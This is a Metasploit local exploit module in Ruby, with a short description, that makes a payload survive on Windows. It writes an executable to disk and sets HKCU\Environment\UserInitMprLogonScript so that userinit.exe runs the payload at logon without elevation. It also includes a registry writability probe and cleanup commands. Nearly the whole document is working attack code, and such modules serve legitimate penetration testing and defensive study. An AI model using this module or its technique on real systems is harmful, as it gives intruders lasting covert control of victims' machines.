Windows Persistence via UserInitMprLogonScript

Creates persistence by writing a payload executable to disk and setting the UserInitMprLogonScript value under HKCU\Environment to its path, so userinit.exe runs the payload at the next logon of that user. No elevation is required because HKCU is writable by the current user.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

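class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::Local::Persistence
  prepend Msf::Exploit::Remote::AutoCheck

  # Registry value name consulted by userinit.exe during logon.
  LOGON_SCRIPT_VALUE = 'UserInitMprLogonScript'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Persistence via UserInitMprLogonScript',
        'Description' => %q{
          This module establishes persistence by setting the UserInitMprLogonScript
          value in HKCU\Environment. During user logon, userinit.exe checks this value
          and executes the specified command or binary.

          The module writes a payload executable to disk and points
          UserInitMprLogonScript to that payload. HKCU is writable by the
          current user, so no elevation is required; the persistence only
          fires for the account the session runs as.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Nayera'],
        'Platform' => [ 'win' ],
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'References' => [
          # NOTE(review): MITRE catalogues UserInitMprLogonScript under T1037.001
          # (Boot or Logon Initialization Scripts: Logon Script (Windows)); T1547.001
          # covers Run keys / Startup folder. Retag if the framework exposes a
          # T1037.001 constant.
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-07-01',
        'Notes' => {
          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.'])
    ])
  end

  # Key that holds the logon-script value. It lives in the current-user hive,
  # which is why an unprivileged session suffices.
  def regkey
    'HKCU\\Environment'
  end

  # Probe whether the target key accepts a value write by setting and then
  # removing a throwaway value. This is not a passive check: the probe write is
  # itself a registry-modification event that EDR/Sysmon may log, and a failed
  # delete leaves a random REG_SZ behind (reported rather than ignored).
  #
  # @return [CheckCode] Vulnerable when the key is writable, Safe otherwise.
  def check
    # .to_s guards against a nil WritableDir (the option is declared by the
    # Persistence mixin, not visible here) raising NoMethodError.
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].to_s.start_with?('%TEMP%')

    return CheckCode::Safe("#{writable_dir} does not exist") unless exists?(writable_dir)

    test_name = Rex::Text.rand_text_alpha(8)
    test_value = Rex::Text.rand_text_alpha(8)
    return CheckCode::Safe("Unable to write to registry path #{regkey}") unless registry_setvaldata(regkey, test_name, test_value, 'REG_SZ')

    # Best-effort removal of the probe value; warn so the operator knows an
    # extra artifact was left on the target if it did not succeed.
    print_warning("Could not remove probe value #{regkey}\\#{test_name}; clean it up manually") unless registry_deleteval(regkey, test_name)

    CheckCode::Vulnerable('Registry path is writable')
  end

  # Drop the payload and point the logon-script value at it, recording an rc
  # script that restores the previous value (or deletes it if none existed)
  # and removes the dropped file.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the file write or the
  #   registry write fails; on a registry failure the dropped file is removed
  #   first so the failed attempt leaves no binary behind.
  def install_persistence
    payload_name = datastore['PAYLOAD_NAME']
    # Treat an empty PAYLOAD_NAME like an unset one rather than producing ".exe".
    payload_name = Rex::Text.rand_text_alpha(rand(6..13)) if payload_name.nil? || payload_name.empty?
    payload_exe = generate_payload_exe
    payload_pathname = "#{writable_dir}\\#{payload_name}.exe"

    vprint_good("Writing payload to #{payload_pathname}")
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)

    # Capture the pre-existing value before overwriting so cleanup can restore it.
    old_value = registry_getvaldata(regkey, LOGON_SCRIPT_VALUE)
    unless registry_setvaldata(regkey, LOGON_SCRIPT_VALUE, payload_pathname, 'REG_SZ')
      file_rm(payload_pathname)
      fail_with(Failure::Unknown, "Unable to set #{regkey}\\#{LOGON_SCRIPT_VALUE}")
    end
    print_good("Configured #{regkey}\\#{LOGON_SCRIPT_VALUE} to execute #{payload_pathname}")

    @clean_up_rc = build_cleanup_rc(old_value, payload_pathname)
  end

  private

  # Build the rc snippet that undoes install_persistence.
  #
  # @param old_value [String, nil] previous UserInitMprLogonScript data; nil
  #   means the value did not exist and is deleted outright.
  # @param payload_pathname [String] Windows path of the dropped payload.
  # @return [String] newline-terminated rc commands.
  #
  # The restore line is quoted with \" escapes, i.e. it is evidently tokenised
  # shell-style before reaching cmd.exe, so backslashes in the restored data are
  # doubled to survive that pass. The block form of gsub is deliberate:
  # gsub('\\', '\\\\') is a no-op in Ruby because "\\" in a replacement string
  # denotes a single literal backslash.
  def build_cleanup_rc(old_value, payload_pathname)
    rc = +''
    if old_value.nil?
      rc << "reg deleteval -k '#{regkey}' -v '#{LOGON_SCRIPT_VALUE}'\n"
    else
      escaped_old_value = old_value.gsub('\\') { '\\\\' }
      rc << %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v #{LOGON_SCRIPT_VALUE} /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
    end
    rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
    rc
  end
end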
